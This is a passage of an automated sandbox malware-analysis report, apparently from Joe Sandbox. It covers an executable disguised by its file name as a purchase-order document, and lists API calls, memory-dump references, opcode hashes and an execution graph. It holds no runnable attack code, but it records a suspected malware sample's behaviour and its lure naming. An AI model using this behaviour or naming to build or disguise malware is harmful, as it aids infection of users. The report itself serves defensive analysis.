                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Window$CountCreateDestroyDialogParamShowTick
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2102729457-0
                                                                                                                                                                • Opcode ID: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                                                                                                                                                • Instruction ID: d1c4e1838bfb856cd6d3ea9dd85ee240d54de3540c59ddf7a57925f8cf4fbe18
                                                                                                                                                                • Opcode Fuzzy Hash: 7de69ba99e19708d0d579c18d4dfd725f7e56dba20af062519453b561e00e44c
                                                                                                                                                                • Instruction Fuzzy Hash: 52F0D030909620BFC6616F18BD4CE5F7BA4E745B117518467F204A11A5D27CA8838FAD
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,007A0500,Error launching installer), ref: 0040536C
                                                                                                                                                                • CloseHandle.KERNEL32(?), ref: 00405379
                                                                                                                                                                Strings
                                                                                                                                                                • Error launching installer, xrefs: 0040535A
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                                                                • String ID: Error launching installer
                                                                                                                                                                • API String ID: 3712363035-66219284
                                                                                                                                                                • Opcode ID: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                                                                                                                                • Instruction ID: f3300c01cb1876a67fd1897e7389f13c8369481b1b26804573fe4f9c45dca3ad
                                                                                                                                                                • Opcode Fuzzy Hash: 788b6a00b7ec5152489f9dc894b393f1b4e1631423b852db40bb4005bf856efe
                                                                                                                                                                • Instruction Fuzzy Hash: 22E0ECB4900209AFDB009F64DC09E6F7BBCFB00344F40CA21BD11E2150F778E9108AA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76DC3410,00403565,004033A9,?), ref: 004035A7
                                                                                                                                                                • GlobalFree.KERNEL32(008CE5A8), ref: 004035AE
                                                                                                                                                                Strings
                                                                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 0040359F
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Free$GlobalLibrary
                                                                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                                                • API String ID: 1100898210-3355392842
                                                                                                                                                                • Opcode ID: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                                                                                                                                • Instruction ID: 25ceb6f6e8048fd8c7c72bafa6746df7c9a9eea5615397dbd2628d9726c916a8
                                                                                                                                                                • Opcode Fuzzy Hash: a867077822133ff692d23af0c54fa15bc8068d047174f32ce19527d60d8a5524
                                                                                                                                                                • Instruction Fuzzy Hash: 6EE08C32805020ABC6215F14AD0471AB6686B89B22F01406BE9407B2A087B8AD428BD8
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,80000000,00000003), ref: 00405671
                                                                                                                                                                • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402C9F,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,C:\Users\user\Desktop\PURCHASEORDERSHEET&SPECIFICATIONSDOC.exe,80000000,00000003), ref: 0040567F
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: CharPrevlstrlen
                                                                                                                                                                • String ID: C:\Users\user\Desktop
                                                                                                                                                                • API String ID: 2709904686-3370423016
                                                                                                                                                                • Opcode ID: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                                                                                                                                • Instruction ID: 066a61083934c2e15797617eaf2660ffc2c94803564b26df0c9315ada1aa8723
                                                                                                                                                                • Opcode Fuzzy Hash: 34a4f8c708b27f6946e7134e7721e231f8b12887e9b4f023f0af0bef71a59494
                                                                                                                                                                • Instruction Fuzzy Hash: 38D0A762409D702EF30352108C04BEF6A88CF12300F0904A2E440E21D0C2781C418BED
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                  • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                                                                                                                                                  • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                                                                                                                                                • GlobalAlloc.KERNEL32(00000040,?), ref: 1000115B
                                                                                                                                                                • GlobalFree.KERNEL32(00000000), ref: 100011B4
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100011C7
                                                                                                                                                                • GlobalFree.KERNEL32(?), ref: 100011F5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56148208324.0000000010001000.00000020.00000001.01000000.00000008.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56148179515.0000000010000000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148234676.0000000010003000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56148257836.0000000010005000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_10000000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Global$Free$Alloclstrcpy
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 852173138-0
                                                                                                                                                                • Opcode ID: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                                                                                                                                                • Instruction ID: 26a7307167ea038f6128c28db1d5d02e0c11c1c5116c5a7ce728bb40d8b914e2
                                                                                                                                                                • Opcode Fuzzy Hash: c9149b92212d33adc4212204361ca6219cf995c9886f0e0edac76aa4d1876c43
                                                                                                                                                                • Instruction Fuzzy Hash: E431BAB2808254AFF705CF64EC89AEA7FE8EB052C0B164116FA45D626CDB349910CB28
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenA.KERNEL32(00000000,?,00000000,00000000,?,00000000,0040599C,00000000,[Rename]), ref: 0040579A
                                                                                                                                                                • lstrcmpiA.KERNEL32(?,?), ref: 004057B2
                                                                                                                                                                • CharNextA.USER32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057C3
                                                                                                                                                                • lstrlenA.KERNEL32(?,?,00000000,0040599C,00000000,[Rename]), ref: 004057CC
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000005.00000002.56133185523.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                • Associated: 00000005.00000002.56133157984.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133214233.0000000000407000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000409000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.000000000077A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000780000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000784000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A0000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A4000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007A7000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133243648.00000000007BD000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                • Associated: 00000005.00000002.56133689025.00000000007BF000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_5_2_400000_PURCHASEORDERSHEET&SPECIFICATIONSDOC.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 190613189-0
                                                                                                                                                                • Opcode ID: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                                                                                                                                • Instruction ID: df48b93824ef6af08d299fa443af8079e3e9d2208639ace1cb57769ac35cd01d
                                                                                                                                                                • Opcode Fuzzy Hash: 4d6aa7fcecb591248e5394db533e431d238a5c46998e6b160d14a30e062bce79
                                                                                                                                                                • Instruction Fuzzy Hash: DBF0C235504518FFC7029BA5DC4099FBBB8EF45350F2540AAF800F7210D274EE01ABA9
                                                                                                                                                                Uniqueness

                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                Execution Graph

                                                                                                                                                                Execution Coverage:6.8%
                                                                                                                                                                Dynamic/Decrypted Code Coverage:9.2%
                                                                                                                                                                Signature Coverage:5.1%
                                                                                                                                                                Total number of Nodes:2000
                                                                                                                                                                Total number of Limit Nodes:67
                                                                                                                                                                execution_graph 37634 44dea5 37635 44deb5 FreeLibrary 37634->37635 37636 44dec3 37634->37636 37635->37636 37637 4287c1 37638 4287d2 37637->37638 37641 429ac1 37637->37641 37642 428818 37638->37642 37643 42881f 37638->37643 37654 425711 37638->37654 37639 4259da 37700 416760 11 API calls 37639->37700 37652 425ad6 37641->37652 37707 415c56 11 API calls 37641->37707 37674 42013a 37642->37674 37702 420244 97 API calls 37643->37702 37644 4259c2 37644->37652 37694 415c56 11 API calls 37644->37694 37647 4260dd 37701 424251 120 API calls 37647->37701 37653 429a4d 37658 429a66 37653->37658 37659 429a9b 37653->37659 37654->37639 37654->37641 37654->37644 37654->37653 37657 422aeb memset memcpy memcpy 37654->37657 37663 4260a1 37654->37663 37673 425a38 37654->37673 37690 4227f0 memset memcpy 37654->37690 37691 422b84 15 API calls 37654->37691 37692 422b5d memset memcpy memcpy 37654->37692 37693 422640 13 API calls 37654->37693 37695 4241fc 11 API calls 37654->37695 37696 42413a 90 API calls 37654->37696 37657->37654 37703 415c56 11 API calls 37658->37703 37662 429a96 37659->37662 37705 416760 11 API calls 37659->37705 37706 424251 120 API calls 37662->37706 37699 415c56 11 API calls 37663->37699 37666 429a7a 37704 416760 11 API calls 37666->37704 37673->37644 37697 422640 13 API calls 37673->37697 37698 4226e0 12 API calls 37673->37698 37675 42014c 37674->37675 37678 420151 37674->37678 37717 41e466 97 API calls 37675->37717 37677 420162 37677->37654 37678->37677 37679 4201b3 37678->37679 37680 420229 37678->37680 37681 4201b8 37679->37681 37682 4201dc 37679->37682 37680->37677 37683 41fd5e 86 API calls 37680->37683 37708 41fbdb 37681->37708 37682->37677 37687 4201ff 37682->37687 37714 41fc4c 37682->37714 37683->37677 37687->37677 37689 42013a 97 API calls 37687->37689 37689->37677 37690->37654 37691->37654 37692->37654 37693->37654 37694->37639 37695->37654 37696->37654 37697->37673 37698->37673 37699->37639 37700->37647 37701->37652 37702->37654 37703->37666 37704->37662 37705->37662 37706->37641 37707->37639 37709 41fbf1 37708->37709 37710 41fbf8 37708->37710 37713 41fc39 37709->37713 37732 4446ce 11 API calls 37709->37732 37722 41ee26 37710->37722 37713->37677 37718 41fd5e 37713->37718 37715 41ee6b 86 API calls 37714->37715 37716 41fc5d 37715->37716 37716->37682 37717->37678 37720 41fd65 37718->37720 37719 41fdab 37719->37677 37720->37719 37721 41fbdb 86 API calls 37720->37721 37721->37720 37723 41ee41 37722->37723 37724 41ee32 37722->37724 37733 41edad 37723->37733 37736 4446ce 11 API calls 37724->37736 37727 41ee3c 37727->37709 37730 41ee58 37730->37727 37738 41ee6b 37730->37738 37732->37713 37742 41be52 37733->37742 37736->37727 37737 41eb85 11 API calls 37737->37730 37739 41ee70 37738->37739 37740 41ee78 37738->37740 37798 41bf99 86 API calls 37739->37798 37740->37727 37743 41be6f 37742->37743 37744 41be5f 37742->37744 37748 41be8c 37743->37748 37763 418c63 37743->37763 37777 4446ce 11 API calls 37744->37777 37746 41be69 37746->37727 37746->37737 37748->37746 37749 41bf3a 37748->37749 37751 41bed1 37748->37751 37754 41bee7 37748->37754 37780 4446ce 11 API calls 37749->37780 37753 41bef0 37751->37753 37756 41bee2 37751->37756 37753->37754 37755 41bf01 37753->37755 37754->37746 37781 41a453 86 API calls 37754->37781 37757 41bf24 memset 37755->37757 37759 41bf14 37755->37759 37778 418a6d memset memcpy memset 37755->37778 37767 41ac13 37756->37767 37757->37746 37779 41a223 memset memcpy memset 37759->37779 37762 41bf20 37762->37757 37765 418c72 37763->37765 37764 418c94 37764->37748 37765->37764 37766 418d51 memset memset 37765->37766 37766->37764 37768 41ac3f memset 37767->37768 37770 41ac52 37767->37770 37769 41acd9 37768->37769 37769->37754 37772 41ac6a 37770->37772 37782 41dc14 19 API calls 37770->37782 37773 41aca1 37772->37773 37783 41519d 37772->37783 37773->37769 37775 41acc0 memset 37773->37775 37776 41accd memcpy 37773->37776 37775->37769 37776->37769 37777->37746 37778->37759 37779->37762 37780->37754 37782->37772 37786 4175ed 37783->37786 37794 417570 SetFilePointer 37786->37794 37789 41760a ReadFile 37790 417637 37789->37790 37791 417627 GetLastError 37789->37791 37792 4151b3 37790->37792 37793 41763e memset 37790->37793 37791->37792 37792->37773 37793->37792 37795 4175b2 37794->37795 37796 41759c GetLastError 37794->37796 37795->37789 37795->37792 37796->37795 37797 4175a8 GetLastError 37796->37797 37797->37795 37798->37740 37799 417bc5 37800 417c61 37799->37800 37805 417bda 37799->37805 37801 417bf6 UnmapViewOfFile CloseHandle 37801->37801 37801->37805 37803 417c2c 37803->37805 37811 41851e 20 API calls 37803->37811 37805->37800 37805->37801 37805->37803 37806 4175b7 37805->37806 37807 4175d6 FindCloseChangeNotification 37806->37807 37808 4175c8 37807->37808 37809 4175df 37807->37809 37808->37809 37810 4175ce Sleep 37808->37810 37809->37805 37810->37807 37811->37803 37812 4152c7 malloc 37813 4152ef 37812->37813 37815 4152e2 37812->37815 37816 416760 11 API calls 37813->37816 37816->37815 37817 415308 ??3@YAXPAX 37818 4232e8 37819 4232ef 37818->37819 37822 415b2c 37819->37822 37821 423305 37823 415b46 37822->37823 37824 415b42 37822->37824 37823->37821 37824->37823 37825 415b94 37824->37825 37827 415b5a 37824->37827 37829 4438b5 37825->37829 37827->37823 37828 415b79 memcpy 37827->37828 37828->37823 37830 4438d0 37829->37830 37840 4438c9 37829->37840 37843 415378 memcpy memcpy 37830->37843 37840->37823 37844 41276d 37845 41277d 37844->37845 37887 4044a4 LoadLibraryW 37845->37887 37847 412785 37848 412789 37847->37848 37895 414b81 37847->37895 37851 4127c8 37901 412465 memset ??2@YAPAXI 37851->37901 37853 4127ea 37913 40ac21 37853->37913 37858 412813 37931 40dd07 memset 37858->37931 37859 412827 37936 40db69 memset 37859->37936 37862 412822 37957 4125b6 ??3@YAXPAX 37862->37957 37864 40ada2 _wcsicmp 37866 41283d 37864->37866 37866->37862 37868 412863 CoInitialize 37866->37868 37941 41268e 37866->37941 37961 4123e2 GetModuleHandleW RegisterClassW GetModuleHandleW CreateWindowExW 37868->37961 37872 41296f 37963 40b633 37872->37963 37874 412873 ShowWindow UpdateWindow GetModuleHandleW LoadAcceleratorsW GetMessageW 37879 412957 37874->37879 37884 4128ca 37874->37884 37879->37862 37880 4128d0 TranslateAcceleratorW 37881 412941 GetMessageW 37880->37881 37880->37884 37881->37879 37881->37880 37882 412909 IsDialogMessageW 37882->37881 37882->37884 37883 4128fd IsDialogMessageW 37883->37881 37883->37882 37884->37880 37884->37882 37884->37883 37885 41292b TranslateMessage DispatchMessageW 37884->37885 37886 41291f IsDialogMessageW 37884->37886 37885->37881 37886->37881 37886->37885 37888 4044f7 37887->37888 37889 4044cf GetProcAddress 37887->37889 37893 404507 MessageBoxW 37888->37893 37894 40451e 37888->37894 37890 4044e8 FreeLibrary 37889->37890 37891 4044df 37889->37891 37890->37888 37892 4044f3 37890->37892 37891->37890 37892->37888 37893->37847 37894->37847 37896 414b8a 37895->37896 37897 412794 SetErrorMode GetModuleHandleW EnumResourceTypesW 37895->37897 37967 40a804 memset 37896->37967 37897->37851 37900 414b9e GetProcAddress 37900->37897 37902 4124e0 37901->37902 37903 412505 ??2@YAPAXI 37902->37903 37904 412521 37903->37904 37905 41251c 37903->37905 37978 444722 37904->37978 37989 40e820 memset ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI ??2@YAPAXI 37905->37989 37912 41259b wcscpy 37912->37853 37994 40b1ab ??3@YAXPAX ??3@YAXPAX 37913->37994 37915 40ad76 37995 40aa04 37915->37995 37918 40a9ce malloc memcpy ??3@YAXPAX ??3@YAXPAX 37921 40ac5c 37918->37921 37919 40ad4b 37919->37915 38018 40a9ce 37919->38018 37921->37915 37921->37918 37921->37919 37922 40ace7 ??3@YAXPAX 37921->37922 37998 40a8d0 37921->37998 38010 4099f4 37921->38010 37922->37921 37926 40a8d0 7 API calls 37926->37915 37927 40ada2 37928 40adc9 37927->37928 37929 40adaa 37927->37929 37928->37858 37928->37859 37929->37928 37930 40adb3 _wcsicmp 37929->37930 37930->37928 37930->37929 38023 40dce0 37931->38023 37933 40dd3a GetModuleHandleW 38028 40dba7 37933->38028 37937 40dce0 3 API calls 37936->37937 37938 40db99 37937->37938 38100 40dae1 37938->38100 38114 402f3a 37941->38114 37943 412766 37943->37862 37943->37868 37944 4126d3 _wcsicmp 37945 4126a8 37944->37945 37945->37943 37945->37944 37947 41270a 37945->37947 38149 4125f8 7 API calls 37945->38149 37947->37943 38117 411ac5 37947->38117 37958 4125da 37957->37958 37959 4125f0 37958->37959 37960 4125e6 DeleteObject 37958->37960 37962 40b1ab ??3@YAXPAX ??3@YAXPAX 37959->37962 37960->37959 37961->37874 37962->37872 37964 40b640 37963->37964 37965 40b639 ??3@YAXPAX 37963->37965 37966 40b1ab ??3@YAXPAX ??3@YAXPAX 37964->37966 37965->37964 37966->37848 37968 40a83b GetSystemDirectoryW 37967->37968 37969 40a84c wcscpy 37967->37969 37968->37969 37974 409719 wcslen 37969->37974 37972 40a881 LoadLibraryW 37973 40a886 37972->37973 37973->37897 37973->37900 37975 409724 37974->37975 37976 409739 wcscat LoadLibraryW 37974->37976 37975->37976 37977 40972c wcscat 37975->37977 37976->37972 37976->37973 37977->37976 37979 444732 37978->37979 37980 444728 DeleteObject 37978->37980 37990 409cc3 37979->37990 37980->37979 37982 412551 37983 4010f9 37982->37983 37984 401130 37983->37984 37985 401134 GetModuleHandleW LoadIconW 37984->37985 37986 401107 wcsncat 37984->37986 37987 40a7be 37985->37987 37986->37984 37988 40a7d2 37987->37988 37988->37912 37988->37988 37989->37904 37993 409bfd memset wcscpy 37990->37993 37992 409cdb CreateFontIndirectW 37992->37982 37993->37992 37994->37921 37996 40aa14 37995->37996 37997 40aa0a ??3@YAXPAX 37995->37997 37996->37927 37997->37996 37999 40a8eb 37998->37999 38000 40a8df wcslen 37998->38000 38001 40a906 ??3@YAXPAX 37999->38001 38002 40a90f 37999->38002 38000->37999 38004 40a919 38001->38004 38003 4099f4 3 API calls 38002->38003 38003->38004 38005 40a932 38004->38005 38006 40a929 ??3@YAXPAX 38004->38006 38008 4099f4 3 API calls 38005->38008 38007 40a93e memcpy 38006->38007 38007->37921 38009 40a93d 38008->38009 38009->38007 38011 409a41 38010->38011 38012 4099fb malloc 38010->38012 38011->37921 38014 409a37 38012->38014 38015 409a1c 38012->38015 38014->37921 38016 409a30 ??3@YAXPAX 38015->38016 38017 409a20 memcpy 38015->38017 38016->38014 38017->38016 38019 40a9e7 38018->38019 38020 40a9dc ??3@YAXPAX 38018->38020 38021 4099f4 3 API calls 38019->38021 38022 40a9f2 38020->38022 38021->38022 38022->37926 38047 409bca GetModuleFileNameW 38023->38047 38025 40dce6 wcsrchr 38026 40dcf5 38025->38026 38027 40dcf9 wcscat 38025->38027 38026->38027 38027->37933 38048 44db70 38028->38048 38032 40dbfd 38051 4447d9 38032->38051 38035 40dc34 wcscpy wcscpy 38077 40d6f5 38035->38077 38036 40dc1f wcscpy 38036->38035 38039 40d6f5 3 API calls 38040 40dc73 38039->38040 38041 40d6f5 3 API calls 38040->38041 38042 40dc89 38041->38042 38043 40d6f5 3 API calls 38042->38043 38044 40dc9c EnumResourceNamesW EnumResourceNamesW wcscpy 38043->38044 38083 40da80 38044->38083 38047->38025 38049 40dbb4 memset memset 38048->38049 38050 409bca GetModuleFileNameW 38049->38050 38050->38032 38053 4447f4 38051->38053 38052 40dc1b 38052->38035 38052->38036 38053->38052 38054 444807 ??2@YAPAXI 38053->38054 38055 44481f 38054->38055 38056 444873 _snwprintf 38055->38056 38057 4448ab wcscpy 38055->38057 38090 44474a 8 API calls 38056->38090 38059 4448bb 38057->38059 38091 44474a 8 API calls 38059->38091 38060 4448a7 38060->38057 38060->38059 38062 4448cd 38092 44474a 8 API calls 38062->38092 38064 4448e2 38093 44474a 8 API calls 38064->38093 38066 4448f7 38094 44474a 8 API calls 38066->38094 38068 44490c 38095 44474a 8 API calls 38068->38095 38070 444921 38096 44474a 8 API calls 38070->38096 38072 444936 38097 44474a 8 API calls 38072->38097 38074 44494b 38098 44474a 8 API calls 38074->38098 38076 444960 ??3@YAXPAX 38076->38052 38078 44db70 38077->38078 38079 40d702 memset GetPrivateProfileStringW 38078->38079 38080 40d752 38079->38080 38081 40d75c WritePrivateProfileStringW 38079->38081 38080->38081 38082 40d758 38080->38082 38081->38082 38082->38039 38084 44db70 38083->38084 38085 40da8d memset 38084->38085 38086 40daac LoadStringW 38085->38086 38087 40dac6 38086->38087 38087->38086 38089 40dade 38087->38089 38099 40d76e memset GetPrivateProfileStringW WritePrivateProfileStringW memset _itow 38087->38099 38089->37862 38090->38060 38091->38062 38092->38064 38093->38066 38094->38068 38095->38070 38096->38072 38097->38074 38098->38076 38099->38087 38110 409b98 GetFileAttributesW 38100->38110 38102 40daea 38103 40db63 38102->38103 38104 40daef wcscpy wcscpy GetPrivateProfileIntW 38102->38104 38103->37864 38111 40d65d GetPrivateProfileStringW 38104->38111 38106 40db3e 38112 40d65d GetPrivateProfileStringW 38106->38112 38108 40db4f 38113 40d65d GetPrivateProfileStringW 38108->38113 38110->38102 38111->38106 38112->38108 38113->38103 38150 40eaff 38114->38150 38118 411ae2 memset 38117->38118 38119 411b8f 38117->38119 38190 409bca GetModuleFileNameW 38118->38190 38131 411a8b 38119->38131 38121 411b0a wcsrchr 38122 411b22 wcscat 38121->38122 38123 411b1f 38121->38123 38191 414770 wcscpy wcscpy wcscpy CreateFileW CloseHandle 38122->38191 38123->38122 38125 411b67 38192 402afb 38125->38192 38129 411b7f 38248 40ea13 SendMessageW memset SendMessageW 38129->38248 38132 402afb 27 API calls 38131->38132 38133 411ac0 38132->38133 38134 4110dc 38133->38134 38135 41113e 38134->38135 38141 4110f0 38134->38141 